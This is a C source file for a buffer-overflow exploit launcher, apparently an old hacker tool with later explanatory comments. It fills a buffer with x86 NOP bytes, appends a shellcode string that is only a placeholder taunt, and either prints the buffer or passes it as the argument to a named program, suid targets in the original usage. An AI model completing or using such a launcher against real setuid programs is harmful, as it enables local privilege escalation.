/* yep! tested on bof.c & race.c(but not xploiting the race!:) from stylezfr!
 * 															(thx Ad & Martony)
 *
 * if you want a man, read this silly code!
 *
 * so a bofxploit easy to use, by eldre8@cyberdude.com
 *
 * placer sous GPL 2.0! (special pour Offset ;)
 * j'ai pas lu en detail, mais j'interdit (arf, c'est dur:) quiconque
 * d'expliquer a qq'un les parametres ou comment s'en servir, en gros,
 * il ne pourra servir qu'a ceux qui ont les connaissances pour s'en
 * servir et qui ont aussi les connaissances pour coder un tel code...
 * la connaissance se merite!
 */

/* TODO
 *
 * add a randomize for generating other than nop to pass through ids
 * maybe recode this thing in a better way... nop.
 * take the shellcode from a file, better than recompiling; only unnecessary
 * 	if you have coded a good shellcode suitable for any situation (impossible)
 */

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void usage(char *);
void fillnop(char *, int);

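/*
 * Parses the NOP count given on the command line.
 *
 * Accepts only a complete, non-negative decimal number that fits in an int;
 * anything else (trailing junk, overflow, a negative count that would have
 * been converted to a huge size_t by the old atoi()-based code) is rejected.
 *
 * Returns 0 and stores the value in *out on success, -1 on bad input.
 */
static int parse_nop_count(const char *text, int *out) {
    char *end = NULL;

    errno = 0;
    long value = strtol(text, &end, 10);
    if (end == text || *end != '\0' || errno == ERANGE || value < 0 || value > INT_MAX) {
        return -1;
    }
    *out = (int)value;
    return 0;
}

/*
 * Copies `in` to `out` byte for byte, dropping a single trailing newline so
 * that whatever the caller prints next lands on the same line.
 *
 * Uses a one-byte lookahead instead of fseek(): the original loop seeked
 * back after every read, which fails on non-seekable streams and never
 * terminates on a file whose last byte is not a newline (it re-reads the
 * final byte forever).  Unlike the original, a NUL byte in the input does
 * not stop the copy.
 */
static void copy_without_final_newline(FILE *in, FILE *out) {
    int cur = fgetc(in);

    while (cur != EOF) {
        int next = fgetc(in);
        if (cur == '\n' && next == EOF) {
            break;      /* final newline: drop it */
        }
        fputc(cur, out);
        cur = next;
    }
}

/*
 * Builds a buffer of <how_nop> 0x90 bytes followed by the placeholder
 * payload string, then either prints it (argv[1] == "stdout", optionally
 * preceded by the contents of argv[3]) or passes it as the single argument
 * of the program named in argv[1].
 *
 * The buffer is handed over as a C string (printf "%s" / execlp argv), so
 * everything after the first NUL byte is invisible to the receiver; the
 * memcpy below deliberately includes the payload's terminating NUL.
 *
 * Exit status: EXIT_SUCCESS, or EXIT_FAILURE on usage error, bad count,
 * allocation failure or a failed execlp().
 */
int main(int argc, char *argv[]) {
    /* Placeholder only: the original used an unknown escape sequence ("\ ")
     * here, which is not portable C; it is written as a plain space now. */
    char shellcode[] = "ahah!!you\x20have%20to code!!!";
    int hownop = 0;

    if (argc < 3) {
        usage(argv[0]);
        return EXIT_FAILURE;
    }
    if (parse_nop_count(argv[2], &hownop) != 0) {
        fprintf(stderr, "bad NOP count: %s\n", argv[2]);
        return EXIT_FAILURE;
    }

    /* hownop <= INT_MAX, so this sum cannot overflow size_t. */
    size_t nops = (size_t)hownop;
    char *xploit = malloc(nops + sizeof shellcode);
    if (xploit == NULL) {
        fprintf(stdout, "Can't malloc!\n");
        return EXIT_FAILURE;
    }

    fillnop(xploit, hownop);
    memcpy(xploit + nops, shellcode, sizeof shellcode);   /* includes the NUL */
    fprintf(stderr, "Launching the xploit on %s with %d N0P!\n", argv[1], hownop);

    int rc = EXIT_SUCCESS;
    if (strcmp(argv[1], "stdout") == 0) {
        if (argc < 4) {
            fprintf(stderr, "no input file!\n");
        } else {
            fprintf(stderr, "Reading input from %s...\n", argv[3]);
            FILE *finput = fopen(argv[3], "r");
            if (finput == NULL) {
                fprintf(stderr, "Th1s fOk$%%*µ file dozn't exist!\n");
            } else {
                copy_without_final_newline(finput, stdout);
                fclose(finput);
            }
        }
        fprintf(stdout, "%s\n", xploit);
    } else {
        /* execlp() only returns on failure; the sentinel must be a pointer,
         * not a bare NULL, to be portable through the variadic call. */
        if (execlp(argv[1], argv[1], xploit, (char *)NULL) < 0) {
            fprintf(stdout, "bad run!\n");
            rc = EXIT_FAILURE;
        }
    }

    free(xploit);
    return rc;
}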

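/*
 * Prints the command-line synopsis to stdout.
 *
 * The original message omitted the "stdout" mode and its optional third
 * argument (the input file that main() reads when argv[1] is "stdout"),
 * even though main() reports "no input file!" when it is missing.
 *
 * prog: argv[0], echoed into the message.
 */
void usage(char *prog) {
    fprintf(stdout, "Usage: %s <suid_prog|stdout> <how_nop> [input_file]\n", prog);
}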

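/*
 * Fills the first `howto` bytes of `xploit` with 0x90 (the x86 NOP opcode,
 * per the "N0P" wording in main()).
 *
 * A NULL buffer or a non-positive count is a no-op: the original loop
 * already did nothing for howto <= 0, and a plain memset() with the count
 * cast to size_t would instead write a huge range.
 *
 * xploit: destination buffer, must hold at least `howto` bytes.
 * howto:  number of bytes to fill.
 */
void fillnop(char *xploit, int howto) {
    if (xploit == NULL || howto <= 0) {
        return;
    }
    memset(xploit, 0x90, (size_t)howto);
}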

